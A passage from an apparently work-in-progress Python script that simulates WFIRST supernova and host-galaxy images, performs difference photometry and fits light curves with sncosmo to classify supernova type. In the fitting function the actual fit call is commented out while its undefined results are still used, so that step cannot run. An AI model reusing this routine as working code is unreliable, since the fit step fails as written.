(x, y, 2, 1)\n coords = np.transpose(np.array([[x, y]]))\n # the \"transpose\" of the vector x turns from being a column vector (shape = (2, 1)) to a\n # row vector (shape = (1, 2)), but should still have external shape (x, y), so we start\n # with vector of (2, 1, y, x) and transpose again\n coords_t = np.transpose(np.array([[x], [y]]))\n # total flux in galaxy -- ensure that all units end up in flux as counts/s accordingly\n Sg = 10**(-1/2.5 * (mag - filt_zp))\n for k in range(0, len(mks)):\n pk = pks[k]\n Vk = Vks[k]\n mk = mks[k]\n for m in range(0, len(vms)):\n cm = cms[m]\n vm = vms[m]\n # Vgm = RVR^T = vm RR^T given that V = vmI\n Vgm = vm * Vgm_unit\n # reshape m and m_t to force propagation of arrays, remembering row vectors are\n # (1, x) and column vectors are (x, 1) in shape\n m = (mk + xg).reshape(1, 1, 2, 1)\n m_t = m.reshape(1, 1, 1, 2)\n V = Vgm + Vk\n g_2d = gaussian_2d(coords, coords_t, m, m_t, V)\n # having converted the covariance matrix to half-light radii, we need to account for a\n # corresponding reverse correction so that the PSF dimensions are correct, which are\n # defined in pure pixel scale\n image += Sg * cm * pk * g_2d / (half_l_r / pixel_scale)**2\n return image\n\n\ndef mog_add_psf(image, psf_params, filt_zp, psf_c):\n image = np.copy(image)\n offset_ra_pix, offset_dec_pix, mag = psf_params\n x_cent, y_cent = (image.shape[0]-1)/2, (image.shape[1]-1)/2\n xg = np.array([[(offset_ra_pix + x_cent) * pixel_scale],\n [(offset_dec_pix + y_cent) * pixel_scale]])\n x_pos = (np.arange(0, image.shape[0])) * pixel_scale\n y_pos = (np.arange(0, image.shape[1])) * pixel_scale\n x, y = np.meshgrid(x_pos, y_pos, indexing='xy')\n # n-D gaussians have mahalnobis distance (x - mu)^T Sigma^-1 (x - mu) so coords_t and m_t\n # should be *row* vectors, and thus be shape (1, x) while coords and m should be column\n # vectors and shape (x, 1). starting with coords, we need to add the grid of data, so if\n # this array has shape (1, 2, y, x), and if we transpose it it'll have shape (x, y, 2, 1)\n coords = np.transpose(np.array([[x, y]]))\n # the \"transpose\" of the vector x turns from being a column vector (shape = (2, 1)) to a\n # row vector (shape = (1, 2)), but should still have external shape (x, y), so we start\n # with vector of (2, 1, y, x) and transpose again\n coords_t = np.transpose(np.array([[x], [y]]))\n\n mks = psf_c[:, [0, 1]].reshape(-1, 2, 1)\n pks = psf_c[:, 5] # what is referred to as 'c' in psf_mog_fitting is p_k in H&L13\n sx, sy, r = psf_c[:, 2], psf_c[:, 3], psf_c[:, 4]\n Vks = np.array([[[sx[q]**2, r[q]*sx[q]*sy[q]], [r[q]*sx[q]*sy[q], sy[q]**2]] for\n q in range(0, len(sx))])\n # convert PSF position and covariance matrix to arcseconds, from pixels\n mks *= pixel_scale\n Vks *= pixel_scale**2\n\n # total flux in source -- ensure that all units end up in flux as counts/s accordingly\n Sg = 10**(-1/2.5 * (mag - filt_zp))\n count = np.sum(image)\n for k in range(0, len(mks)):\n pk = pks[k]\n V = Vks[k]\n mk = mks[k]\n # reshape m and m_t to force propagation of arrays, remembering row vectors are\n # (1, x) and column vectors are (x, 1) in shape\n m = (mk + xg).reshape(1, 1, 2, 1)\n m_t = m.reshape(1, 1, 1, 2)\n g_2d = gaussian_2d(coords, coords_t, m, m_t, V)\n # equivalent to the mog_galaxy version, we converted the covariance matrix to arcseconds\n # so need to undo the unit change to get the correct dimensions, having fit for the PSF\n # in pure pixels\n image += Sg * pk * g_2d * pixel_scale**2\n return image\n\n\ndef make_figures(filters, img_sn, img_no_sn, diff_img, exptime, directory, counter, times,\n random_flag):\n nfilts = len(filters)\n ntimes = len(times)\n if random_flag:\n ntimes_array = [np.random.choice(ntimes)]\n nfilts_array = [np.random.choice(nfilts)]\n ntimes, nfilts = 1, 1\n else:\n ntimes_array = np.arange(0, ntimes)\n nfilts_array = np.arange(0, nfilts)\n gs = gridcreate('111', 3*ntimes, nfilts, 0.8, 15)\n # if random_flag is False then k_ and k are the same, otherwise k_ should be 0 (or 0, 1, 2) if\n # random_flag allows for a larger-than-one subset in the future, while k can be (2, 6, 10, 50),\n # etc., striding at random\n for k_, k in enumerate(ntimes_array):\n for j_, j in enumerate(nfilts_array):\n image = img_sn[k][j]\n image_shifted = img_no_sn[j]\n image_diff = diff_img[k][j]\n norm = simple_norm(image / exptime, 'linear', percent=99.9)\n ax = plt.subplot(gs[0 + 3*k_, j_])\n img = ax.imshow(image.T / exptime, origin='lower', cmap='viridis', norm=norm)\n cb = plt.colorbar(img, ax=ax, use_gridspec=True)\n cb.set_label('Count rate / e$^-$ s$^{-1}$')\n ax.set_xlabel('x / pixel')\n if j_ == 0:\n ax.set_ylabel('Sn Observation, t = {} days\\ny / pixel'.format(times[k]))\n else:\n ax.set_ylabel('y / pixel')\n if k_ == 0:\n ax.set_title(filters[j].upper())\n ax = plt.subplot(gs[1 + 3*k_, j_])\n img = ax.imshow(image_shifted.T / exptime, origin='lower', cmap='viridis', norm=norm)\n cb = plt.colorbar(img, ax=ax, use_gridspec=True)\n cb.set_label('Count rate / e$^-$ s$^{-1}$')\n ax.set_xlabel('x / pixel')\n if j_ == 0:\n ax.set_ylabel('Sn Reference\\ny / pixel')\n else:\n ax.set_ylabel('y / pixel')\n norm = simple_norm(image_diff / exptime, 'linear', percent=99.9)\n\n ax = plt.subplot(gs[2 + 3*k_, j_])\n img = ax.imshow(image_diff.T / exptime, origin='lower', cmap='viridis', norm=norm)\n cb = plt.colorbar(img, ax=ax, use_gridspec=True)\n cb.set_label('Count rate / e$^-$ s$^{-1}$')\n ax.set_xlabel('x / pixel')\n if j_ == 0:\n ax.set_ylabel('Difference\\ny / pixel')\n else:\n ax.set_ylabel('y / pixel')\n plt.tight_layout()\n plt.savefig('{}/galaxy_{}.pdf'.format(directory, counter))\n plt.close()\n\n\ndef get_sn_model(sn_type, setflag, t0=0.0, z=0.0):\n # salt2 for Ia, s11-* where * is 2004hx for IIL/P, 2005hm for Ib, and 2006fo for Ic\n # draw salt2 x1 and c from salt2_parameters (gaussian, x1: x0=0.4, sigma=0.9, c: x0=-0.04,\n # sigma = 0.1)\n # Hounsell 2017 gives SALT2 models over a wider wavelength range, given as sncosmo source\n # salt2-h17. both salt2 models have phases -20 to +50 days.\n # above non-salt2 models don't give coverage, so trying new ones from the updated builtin\n # source list...\n\n if sn_type == 'Ia':\n sn_model = sncosmo.Model('salt2-h17')\n if setflag:\n x1, c = np.random.normal(0.4, 0.9), np.random.normal(-0.04, 0.1)\n sn_model.set(t0=t0, z=z, x1=x1, c=c)\n elif sn_type == 'Ib':\n sn_model = sncosmo.Model('snana-2007nc')\n if setflag:\n sn_model.set(t0=t0, z=z)\n elif sn_type == 'Ic':\n sn_model = sncosmo.Model('snana-2006lc')\n if setflag:\n sn_model.set(t0=t0, z=z)\n elif sn_type == 'IIP' or sn_type == 'II':\n sn_model = sncosmo.Model('snana-2007nv')\n if setflag:\n sn_model.set(t0=t0, z=z)\n elif sn_type == 'IIL':\n sn_model = sncosmo.Model('nugent-sn21')\n if setflag:\n sn_model.set(t0=t0, z=z)\n # TODO: add galaxy dust via smcosmo.F99Dust([r_v])\n\n return sn_model\n\n\ndef make_images(filters, pixel_scale, sn_type, times, exptime, filt_zp, psf_comp_filename,\n dark_img, flat_img, readnoise, t0):\n nfilts = len(filters)\n ntimes = len(times)\n\n # assuming surface brightnesses vary between roughly mu_e = 18-23 mag/arcsec^2 (mcgaugh\n # 1995, driver 2005, shen 2003 -- assume shen 2003 gives gaussian with mu=20.94, sigma=0.74)\n\n mu_0 = np.random.normal(20.94, 0.74)\n # elliptical galaxies approximated as de vaucouler (n=4) sersic profiles, spirals as\n # exponentials (n=1). axial ratios vary 0.5-1 for ellipticals and 0.1-1 for spirals\n rand_num = np.random.uniform()\n n_type = 4 if rand_num < 0.5 else 1\n # randomly draw the ellipcity from 0.5/0.1 to 1, depending on sersic index\n e_disk = np.random.uniform(0.5 if n_type == 4 else 0.1, 1.0)\n # position angle can be uniformly drawn [0, 360) as we convert to radians elsewhere\n pa_disk = np.random.uniform(0, 360)\n # half-light radius can be uniformly drawn between two reasonable radii\n lr_low, lr_high = 0.3, 2.5\n half_l_r = np.random.uniform(lr_low, lr_high)\n # L(< R) / Ltot = \\gamma(2n, x) / \\Gamma(2n); scipy.special.gammainc is lower incomplete over\n # regular gamma function. Thus gammaincinv is the inverse to gammainc, solving\n # L(< r) / Ltot = Y, where Y is a large fraction\n y_frac = 0.75\n x_ = gammaincinv(2*n_type, y_frac)\n # however, x = bn * (R/Re)**(1/n), so we have to solve for R now, approximating bn; in arcsec\n offset_r = (x_ / (2*n_type - 1/3))**n_type * half_l_r\n # redshift randomly drawn between two values uniformly\n z_low, z_high = 0.2, 1.0\n z = np.random.uniform(z_low, z_high)\n\n cm_exp = np.array([0.00077, 0.01077, 0.07313, 0.37188, 1.39727, 3.56054, 4.74340, 1.78732])\n vm_exp_sqrt = np.array([0.02393, 0.06490, 0.13580, 0.25096, 0.42942, 0.69672, 1.08879,\n 1.67294])\n cm_dev = np.array([0.00139, 0.00941, 0.04441, 0.16162, 0.48121, 1.20357, 2.54182, 4.46441,\n 6.22821, 6.15393])\n vm_dev_sqrt = np.array([0.00087, 0.00296, 0.00792, 0.01902, 0.04289, 0.09351, 0.20168, 0.44126,\n 1.01833, 2.74555])\n\n psf_comp = np.load(psf_comp_filename)\n\n # this requires re-normalising as Hogg & Lang (2013) created profiles with unit intensity at\n # their half-light radius, with total flux for the given profile simply being the sum of the\n # MoG coefficients, cm, so we ensure that sum(cm) = 1 for normalisation purposes\n cms = cm_dev / np.sum(cm_dev) if n_type == 4 else cm_exp / np.sum(cm_exp)\n # Vm is always circular so this doesn't need to be a full matrix, but PSF m/V do need to\n vms = np.array(vm_dev_sqrt)**2 if n_type == 4 else np.array(vm_exp_sqrt)**2\n\n # 0.75 mag is really 2.5 * log10(2), for double flux, given area is half-light radius\n mag = mu_0 - 2.5 * np.log10(np.pi * half_l_r**2 * e_disk) - 2.5 * np.log10(2)\n\n # since everything is defined in units of half-light radius, the \"semi-major axis\" is always\n # one with the semi-minor axis simply being the eccentricity (b/a, not to be confused with\n # the ellipicity = sqrt((a**2 - b**2)/a**2) = 1 - b/a) of the ellipse\n a, b = 1, e_disk\n t = np.radians(pa_disk)\n Rg = np.array([[-a * np.sin(t), b * np.cos(t)], [a * np.cos(t), b * np.sin(t)]])\n Vgm_unit = np.matmul(Rg, np.transpose(Rg))\n\n endflag = 0\n while endflag == 0:\n # random offsets for star should be in arcseconds; pixel scale is 0.11 arcsecond/pixel\n rand_ra = -offset_r + np.random.random_sample() * 2 * offset_r\n rand_dec = -offset_r + np.random.random_sample() * 2 * offset_r\n # the full equation for a shifted, rotated ellipse, with semi-major axis\n # originally aligned with the y-axis, is given by:\n # ((x-p)cos(t)-(y-q)sin(t))**2/b**2 + ((x-p)sin(t) + (y-q)cos(t))**2/a**2 = 1\n p = 0\n q = 0\n x = rand_ra\n y = rand_dec\n t = np.radians(pa_disk)\n a = offset_r\n b = e_disk * offset_r\n if (((((x - p) * np.cos(t) - (y - q) * np.sin(t)) / b)**2 +\n (((x - p) * np.sin(t) + (y - q) * np.cos(t)) / a)**2 <= 1) and\n ((((x - p) * np.cos(t) - (y - q) * np.sin(t)) / b)**2 +\n (((x - p) * np.sin(t) + (y - q) * np.cos(t)) / a)**2 > 0.1)):\n endflag = 1\n\n sn_model = get_sn_model(sn_type, 1, t0=t0, z=z)\n # pretending that F125W on WFC3/IR is 2MASS J, we set the absolute magnitude of a\n # type Ia supernova to J = -19.0 (meikle 2000). set supernova to a star of the closest\n # blackbody (10000K; Zheng 2017) -- code uses Johnson I magnitude but Phillips (1993) says that\n # is also ~M = -19 -- currently just setting absolute magnitudes to -19, but could change\n # if needed\n sn_model.set_source_peakabsmag(-19.0, 'f125w', 'ab')\n\n images_with_sn = []\n images_without_sn = []\n diff_images = []\n\n # things that are needed to create the astropy.table.Table for use in fit_lc:\n # time, band (name, see registered bandpasses), flux, fluxerr [both just derived from an\n # image somehow], zp, zpsys [zeropoint and name of system]\n\n time_array = []\n band_array = []\n flux_array = []\n fluxerr_array = []\n zp_array = []\n zpsys_array = []\n\n # given some zodiacal light flux, in ergcm^-2s^-1A^-1arcsec^-2, flip given the ST ZP,\n # then convert back to flux\n zod_flux = 2e-18 # erg/cm^2/s/A/arcsec^2\n zod_mag = -2.5 * np.log10(zod_flux) - 21.1 # st mag system\n zod_count = 10**(-1/2.5 * (zod_mag - filt_zp[0])) # currently using an AB ZP...\n gal_params = [mu_0, n_type, e_disk, pa_disk, half_l_r, offset_r, Vgm_unit, cms, vms, mag]\n # currently assuming a simple half-pixel dither; TODO: check if this is right and update\n second_gal_offets = np.empty((nfilts, 2), float)\n for j in range(0, nfilts):\n # define a random pixel offset ra/dec\n offset_ra, offset_dec = np.random.uniform(0.01, 0.99), np.random.uniform(0.01, 0.99)\n sign = -1 if np.random.uniform(0, 1) < 0.5 else 1\n # non-reference image should be offset by half a pixel, wrapped around [0, 1]\n second_gal_offets[j, 0] = (offset_ra + sign * 0.5 + 1) % 1\n second_gal_offets[j, 1] = (offset_dec + sign * 0.5 + 1) % 1\n image = mog_galaxy(pixel_scale, filt_zp[j], psf_comp[j], gal_params +\n [offset_ra, offset_dec])\n q = np.where(image < 0)\n image[q] = 1e-8\n image = add_background(image, zod_count)\n image = set_exptime(image, exptime)\n image = add_poisson(image)\n image = mult_flat(image, flat_img)\n image = add_dark(image, dark_img)\n image = add_read(image, readnoise)\n images_without_sn.append(image)\n\n true_flux = []\n for k in range(0, ntimes):\n images = []\n images_diff = []\n for j in range(0, nfilts):\n image_shifted = images_without_sn[j]\n # TODO: add exposure and readout time so that exposures are staggered in time\n time = times[k] + t0\n\n # get the apparent magnitude of the supernova at a given time; first get the\n # appropriate filter for the observation\n bandpass = sncosmo.get_bandpass(filters[j])\n # time should be in days\n m_ia = sn_model.bandmag(bandpass, magsys='ab', time=time)\n if np.isnan(m_ia):\n m_ia = -2.5 * np.log10(0.01) + filt_zp[j]\n\n # 'star' will have a distance based on the redshift of the galaxy, given by\n # m - M = \\mu = 42.38 - 5 log10(h) + 5 log10(z) + 5 log10(1+z) where h = 0.7\n # (given by H0 = 100h km/s/Mpc), based on cz = H0d, \\mu = 5 log10(dL) - 5, dL = (1+z)d,\n # and 5log10(c/100km/s/Mpc / pc) = 42.38.\n # h = 0.7\n # mu = 42.38 - 5 * np.log10(h) + 5 * np.log10(z) + 5 * np.log10(1+z)\n # dl = 10**(mu/5 + 1)\n # M_ia = -19\n # m_ia = M_ia + mu\n\n # TODO: add background noise.\n # background comes from jwst_backgrounds.background, converted from MJy/sr to\n # mJy/pixel, converted to counts through the filter and zp I guess?\n # if cosmicrays are needed then figure out what stips does for that...\n offset_ra, offset_dec = second_gal_offets[j, :]\n image = mog_galaxy(pixel_scale, filt_zp[j], psf_comp[j],\n gal_params + [offset_ra, offset_dec])\n image = mog_add_psf(image, [rand_ra / pixel_scale, rand_dec / pixel_scale, m_ia],\n filt_zp[j], psf_comp[j])\n q = np.where(image < 0)\n image[q] = 1e-8\n image = add_background(image, zod_count)\n image = set_exptime(image, exptime)\n image = add_poisson(image)\n image = mult_flat(image, flat_img)\n image = add_dark(image, dark_img)\n image = add_read(image, readnoise)\n\n images.append(image)\n image_diff = image - image_shifted\n images_diff.append(image_diff)\n\n time_array.append(time)\n band_array.append(filters[j])\n\n x_cent, y_cent = (image.shape[0]-1)/2, (image.shape[1]-1)/2\n xind, yind = np.floor(rand_ra / pixel_scale + x_cent).astype(int), np.floor(rand_dec / pixel_scale + y_cent).astype(int)\n N = 4\n\n # current naive sum the entire (box) 'aperture' flux of the Sn, correcting for\n # exposure time in both counts and uncertainty\n diff_sum = np.sum(image_diff[xind-N:xind+N+1, yind-N:yind+N+1]) / exptime\n diff_sum = max(diff_sum, 0.01)\n diff_sum_err = np.sqrt(np.sum(image[xind-N:xind+N+1, yind-N:yind+N+1] +\n image_shifted[xind-N:xind+N+1, yind-N:yind+N+1])) / exptime\n flux_array.append(diff_sum)\n fluxerr_array.append(diff_sum_err)\n zp_array.append(filt_zp[j]) # filter-specific zeropoint\n zpsys_array.append('ab')\n\n true_flux.append(10**(-1/2.5 * (m_ia - filt_zp[j])))\n\n images_with_sn.append(images)\n diff_images.append(images_diff)\n\n lc_data = [np.array(time_array), np.array(band_array), np.array(flux_array),\n np.array(fluxerr_array), np.array(zp_array), np.array(zpsys_array)]\n true_flux = np.array(true_flux)\n\n param_names = ['z', 't0']\n if sn_type == 'Ia':\n param_names += ['x0', 'x1', 'c']\n else:\n param_names += ['amplitude']\n sn_params = [sn_model[q] for q in param_names]\n return images_with_sn, images_without_sn, diff_images, lc_data, sn_params, true_flux\n\n\ndef fit_lc(lc_data, sn_types, directory, filters, counter, figtext, ncol, minsnr, sn_priors,\n filt_zp):\n x2s = np.empty(len(sn_types), float)\n bestfit_models = []\n bestfit_results = []\n fit_time = 0\n largest_z = 2.5\n dz = 0.01\n z_array = np.arange(0, largest_z+1e-10, dz)\n min_counts = 0.0001\n for i, sn_type in enumerate(sn_types):\n start = timeit.default_timer()\n params = ['z', 't0']\n if sn_type == 'Ia':\n params += ['x0', 'x1', 'c']\n else:\n params += ['amplitude']\n sn_model = get_sn_model(sn_type, 0)\n # place upper limits on the redshift probeable, by finding the z at which each filter drops\n # out of being in overlap with the model\n z_upper_band = np.empty(len(filters), float)\n for p in range(0, len(filters)):\n z = 0\n while sn_model.bandoverlap(filters[p], z=z):\n z += dz\n if z > largest_z:\n break # otherwise this will just keep going forever for very red filters\n z_upper_band[p] = min(largest_z, z - dz)\n z_upper_count = np.empty(len(filters), float)\n z_lower_count = np.empty(len(filters), float)\n # the lower limits on z -- for this model -- are, assuming a minsnr detection in that\n # filter, a model flux in the given system of, say, 0.001 counts/s; a very low goal, but\n # one that avoids bluer SNe being selected when they would drop out of the detection. Also\n # avoids models from failing to calculate an amplitude... Similarly, we can calculate the\n # maximum redshift for a blue filter to have a \"detection\".\n for p in range(0, len(filters)):\n countrate = np.empty_like(z_array)\n for q, z_init in enumerate(z_array):\n sn_model.set(z=z_init)\n countrate[q] = sn_model.bandflux(filters[p], time=0, zp=filt_zp[p], zpsys='ab')\n z_upper_count[p] = z_array[np.where(countrate > min_counts)[0][-1]]\n z_lower_count[p] = z_array[np.where(countrate > min_counts)[0][0]]\n # set the bounds on z to be at most the smallest of those available by the given filters in\n # the set being fit here\n z_min = np.amax(z_lower_count)\n z_max = min(np.amin(z_upper_band), np.amin(z_upper_count))\n bounds = {'z': (z_min, z_max)}\n # x1 and c bounded by 3.5-sigma regions (x1: mu=0.4, sigma=0.9, c: mu=-0.04, sigma = 0.1)\n if sn_type == 'Ia':\n bounds.update({'x1': (-2.75, 3.55), 'c': (-0.39, 0.31)})\n result = None\n fitted_model = None\n for z_init in np.linspace(z_min, z_max, 50):\n sn_model.set(z=z_init)\n # result_temp, fitted_model_temp = sncosmo.fit_lc(lc_data, sn_model, params,\n # bounds=bounds, minsnr=minsnr,\n # guess_z=False)\n if result is None or result_temp.chisq < result.chisq:\n result = result_temp\n fitted_model = fitted_model_temp\n # result, fitted_model = sncosmo.mcmc_lc(lc_data, sn_model, params, bounds=bounds,\n # minsnr=minsnr)\n bestfit_models.append(fitted_model)\n bestfit_results.append(result)\n try:\n x2s[i] = result.chisq\n except AttributeError:\n x2s[i] = sncosmo.chisq(lc_data, fitted_model)\n fit_time += timeit.default_timer()-start\n\n print('Fit: {:.2f}s'.format(fit_time))\n probs = sn_priors*np.exp(-0.5 * x2s)\n probs /= np.sum(probs)\n best_ind = np.argmax(probs)\n best_r = bestfit_results[best_ind]\n best_m = bestfit_models[best_ind]\n best_x2 = x2s[best_ind]\n\n figtext = [figtext[0], figtext[1] + '\\n' + r'$\\chi^2_{{\\nu={}}}$ = {:.3f}'.format(best_r.ndof,\n best_x2/best_r.ndof)]\n errors = best_r.errors\n model_params = best_m.parameters\n if sn_types[best_ind] == 'Ia':\n z_format = sncosmo.utils.format_value(model_params[0], errors.get('z'), latex=True)\n t0_format = sncosmo.utils.format_value(model_params[1], errors.get('t0'), latex=True)\n x0_format = sncosmo.utils.format_value(model_params[2], errors.get('x0'), latex=True)\n x1_format = sncosmo.utils.format_value(model_params[3], errors.get('x1'), latex=True)\n c_format = sncosmo.utils.format_value(model_params[4], errors.get('c'), latex=True)\n figtext.append('Type {}: $z = {}$\\n$t_0 = {}$\\n$x_0 = {}$'.format(sn_types[best_ind],\n z_format, t0_format, x0_format))\n if probs[0] > 0:\n p_sig = int(np.floor(np.log10(abs(probs[0]))))\n else:\n p_sig = 0\n if p_sig > 3:\n figtext.append('$x_1 = {}$\\n$c = {}$\\n$P(Ia|D) = {:.3f} \\\\times 10^{}$'.format(\n x1_format, c_format, probs[0]/10**p_sig, p_sig))\n else:\n figtext.append('$x_1 = {}$\\n$c = {}$\\n$P(Ia|D) = {:.3f}$'.format(x1_format, c_format,\n probs[0]))\n else:\n z_format = sncosmo.utils.format_value(model_params[0], errors.get('z'), latex=True)\n t0_format = sncosmo.utils.format_value(model_params[1], errors.get('t0'), latex=True)\n A_format = sncosmo.utils.format_value(model_params[2], errors.get('amplitude'), latex=True)\n figtext.append('Type {}: $z = {}$\\n$t_0 = {}$'.format(sn_types[best_ind],\n z_format, t0_format))\n if probs[0] > 0:\n p_sig = int(np.floor(np.log10(abs(probs[0]))))\n else:\n p_sig = 0\n if p_sig > 3:\n figtext.append('$A = {}$\\n$P(Ia|D) = {:.3f} \\\\times 10^{{{}}}$'.format(A_format, probs[0]/10**p_sig, p_sig))\n else:\n figtext.append('$A = {}$\\n$P(Ia|D) = {:.3f}$'.format(A_format, probs[0]))\n\n fig = sncosmo.plot_lc(lc_data, model=bestfit_models, xfigsize=15*ncol, tighten_ylim=False,\n ncol=ncol, figtext=figtext, figtextsize=2, model_label=sn_types)\n fig.tight_layout(rect=[0, 0.03, 1, 0.935])\n fig.savefig('{}/fit_{}.pdf'.format(directory, counter))\n\n return result, probs[0]\n\n\nif __name__ == '__main__':\n # run_mins, n_runs = 30/60, 100\n # model_number(run_mins, n_runs)\n\n # sys.exit()\n\n ngals = 10\n pixel_scale = 0.11 # arcsecond/pixel\n directory = 'out_gals'\n\n # TODO: vary these parameters\n filters = ['z087', 'y106', 'w149', 'j129', 'h158', 'f184']\n # 1 count/s for infinite aperture, hounsell17, AB magnitudes\n filt_zp = [26.39, 26.41, 27.50, 26.35, 26.41, 25.96]\n\n for j in range(0, len(filters)):\n f = pyfits.open('../../pandeia_data-1.0/wfirst/wfirstimager/filters/{}.fits'\n .format(filters[j]))\n data = f[1].data\n dispersion = np.array([d[0] for d in data])\n transmission = np.array([d[1] for d in data])\n # both F184 and W149 extend 0.004 microns into 2 microns, beyond the wavelength range of\n # the less extended models, 19990A, or 1.999 microns. Thus we slightly chop the ends off\n # these filters, and set the final 'zero' to 1.998 microns:\n if filters[j] == 'f184' or filters[j] == 'w149':\n ind_ = np.where(dispersion < 1.999)[0][-1]\n transmission[ind_:] = 0\n q_ = np.argmax(transmission)\n if transmission[q_] == transmission[q_+1]:\n q_ += 1\n imin = np.where(transmission[:q_] == 0)[0][-1]\n imax = np.where(transmission[q_:] == 0)[0][0] + q_ + 1\n bandpass = sncosmo.Bandpass(dispersion[imin:imax], transmission[imin:imax],\n wave_unit=u.micron, name=filters[j])\n sncosmo.register(bandpass)\n # TODO: vary exptime to explore the effects of exposure cadence on observation\n exptime = 1000 # seconds\n sn_types = ['Ia', 'Ib', 'Ic', 'II']\n\n t_low, t_high, t_interval = -10, 35, 15\n times = np.arange(t_low, t_high+1e-10, t_interval)\n\n # #### WFC3 PSFs ####\n # psf_comp_filename = '../PSFs/wfc3_psf_comp.npy'\n # filters = ['F160W'] # ['F105W', 'F125W', 'F160W']\n # filt_zp = [25.95] # [27.69, 28.02, 28.19] - st; [26.27, 26.23, 25.95] - ab\n # pixel_scale = 0.13\n # psf_names = ['../../../Buffalo/PSFSTD_WFC3IR_F{}W.fits'.format(q) for q in [105, 125, 160]]\n\n psf_comp_filename = '../PSFs/wfirst_psf_comp.npy'\n # psf_names = ['../PSFs/{}.fits'.format(q) for q in filters]\n\n # oversampling, noise_removal, N_comp, cut = 4, 0, 10, 0.01\n # pmf.psf_mog_fitting(psf_names, oversampling, noise_removal, psf_comp_filename, cut, N_comp,\n # 'wfc3' if 'wfc3' in psf_comp_filename else 'wfirst')\n # sys.exit()\n\n f = pyfits.open('../err_rdrk_wfi.fits')\n # dark current is in counts/s, so requires correcting by the exosure time\n dark_img = f[1].data * exptime\n f = pyfits.open('../err_flat_wfi.fits')\n flat_img = f[1].data\n # currently what is in stips, claimed 'max ramp, lowest noise'\n readnoise = 12\n t0 = 50000\n minsnr = 5\n\n ncol = min(3, len(filters))\n\n # flag for whether we should print a representative reference/science/difference image, or\n # all of the frames - useful for avoiding huge figures\n random_flag = 1\n\n # priors on supernovae types: very roughly, these are the relative fractions of each type in\n # the universe, to set the relative likelihoods of the observations with no information; these\n # should follow sn_types as [Ia, Ib, Ic, II]. Boissier & prantzos 2009 quote, roughly and\n # drawn by eye: Ibc/II ~ 0.3, Ic/Ib ~ 1.25, Ia/CC ~ 0.25. Hakobyan 2014, table 8, give:\n NiaNcc, NibcNii, NicNib = 0.44, 0.36, 2.12\n # given a/b=x we get a = x/(1+x) and b = 1/(1+x) = 1 - x/(1+x), so we can convert these to\n # relative fractions:\n fia, fcc = NiaNcc / (1 + NiaNcc), 1 - NiaNcc / (1 + NiaNcc)\n fibc, fii = fcc * NibcNii / (1 + NibcNii), fcc * (1 - NibcNii / (1 + NibcNii))\n fib, fic = fibc * (1 - NicNib / (1 + NicNib)), fibc * NicNib / (1 + NicNib)\n sn_priors = np.array([fia, fib, fic, fii])\n\n # z, t0, x0, x1, c, A[mplitude], maintaining the ability to track Ia/CC, depending on which are\n # randomly drawn\n true_params = np.ones((ngals, 6), float) * -999\n fit_params = np.ones((ngals, 6, 2), float) * -999\n\n i = 0\n colours = ['k', 'r', 'b', 'g', 'c', 'm', 'orange']\n\n types = []\n probs = []\n\n while i < ngals:\n type_ind = np.random.choice(len(sn_types))\n print('==== {} == {} ===='.format(i+1, sn_types[type_ind]))\n start = timeit.default_timer()\n images_with_sn, images_without_sn, diff_images, lc_data, sn_params, true_flux = \\\n make_images(filters, pixel_scale, sn_types[type_ind], times, exptime, filt_zp,\n psf_comp_filename, dark_img, flat_img, readnoise, t0)\n print(\"Make: {:.2f}s\".format(timeit.default_timer()-start))\n lc_data_table = Table(data=lc_data,\n names=['time', 'band', 'flux', 'fluxerr', 'zp', 'zpsys'])\n if not np.amax(lc_data_table['flux'].data / lc_data_table['fluxerr'].data) >= minsnr:\n continue\n\n figtext = []\n if sn_types[type_ind] == 'Ia':\n z_, t_, x0_, x1_, c_ = sn_params\n figtext.append('Type {}: $z = {:.3f}$\\n$t_0 = {:.1f}$\\n'\n '$x_0 = {:.5f}$'.format(sn_types[type_ind], z_, t_, x0_))\n figtext.append('$x_1 = {:.5f}$\\n$c = {:.5f}$'.format(x1_, c_))\n else:\n z_ = sn_params[0]\n t_ = sn_params[1]\n A_ = sn_params[2]\n A_sig = int(np.floor(np.log10(abs(A_))))\n figtext.append('Type {}: $z = {:.3f}$\\n$t_0 = {:.1f}$'.format(\n sn_types[type_ind], z_, t_))\n figtext.append('$A = {:.3f} \\\\times 10^{{{}}}$'.format(A_/10**A_sig, A_sig))\n\n result, prob = fit_lc(lc_data_table, sn_types, directory, filters, i+1, figtext, ncol,\n minsnr, sn_priors, filt_zp)\n make_figures(filters, images_with_sn, images_without_sn, diff_images, exptime,\n directory, i+1, times, random_flag)\n\n gs = gridcreate('09', 1, 1, 0.8, 15)\n ax = plt.subplot(gs[0])\n for c, filter_ in zip(colours, filters):\n q = lc_data_table['band'] == filter_\n ax.errorbar(lc_data_table['time'][q], lc_data_table['flux'][q] - true_flux[q],\n yerr=lc_data_table['fluxerr'][q], fmt='{}.'.format(c), label=filter_)\n ax.legend(shadow=False, framealpha=0)\n ax.axhline(0, c='k', ls='--')\n ax.set_xlabel('Time')\n ax.set_ylabel('Flux difference (fit - true)')\n plt.tight_layout()\n plt.savefig('{}/flux_ratio_{}.pdf'.format(directory, i+1))\n\n if sn_types[type_ind] == 'Ia':\n true_params[i, :-1] = sn_params\n else:\n true_params[i, [0, 1, -1]] = sn_params\n if 'x0' in result.param_names:\n fit_params[i, :-1, 0] = result.parameters\n fit_params[i, :-1, 1] = [result.errors[q] for q in ['z', 't0', 'x0', 'x1', 'c']]\n else:\n fit_params[i, [0, 1, -1], 0] = result.parameters\n fit_params[i, [0, 1, -1], 1] = [result.errors[q] for q in ['z', 't0', 'amplitude']]\n\n # if the original SN is a Ia, then prob will be a \"goodness of Ia-ness\", but if the SN is\n # a CC (Ib/Ic/II) then the probability will be a \"badness of CC-ness\"; if we're fitting a\n # true Ia then we want the probability to be high, otherwise it should be low, but in\n # all cases the probability is P(Ia|D) = P(Ia) * p(D|Ia) / sum_j P(j) p(D|j)\n types.append(sn_types[type_ind])\n probs.append(prob)\n\n i += 1\n\n gs_ = gridcreate('asjhfs', 2, 3, 0.8, 15)\n axs = [plt.subplot(gs_[i]) for i in range(0, 6)]\n for i, (ax, name) in enumerate(zip(axs, ['z', 't0', 'x0', 'x1', 'c', 'A'])):\n q = (fit_params[:, i, 0] > -999) & (true_params[:, i] > -999)\n ax.errorbar(np.arange(1, ngals+1)[q], fit_params[q, i, 0] - true_params[q, i],\n yerr=fit_params[q, i, 1], fmt='k.')\n ax.axhline(0, c='k', ls='--')\n ax.set_xlabel('Count')\n ax.set_ylabel('{} difference (fit - true)'.format(name))\n plt.tight_layout()\n 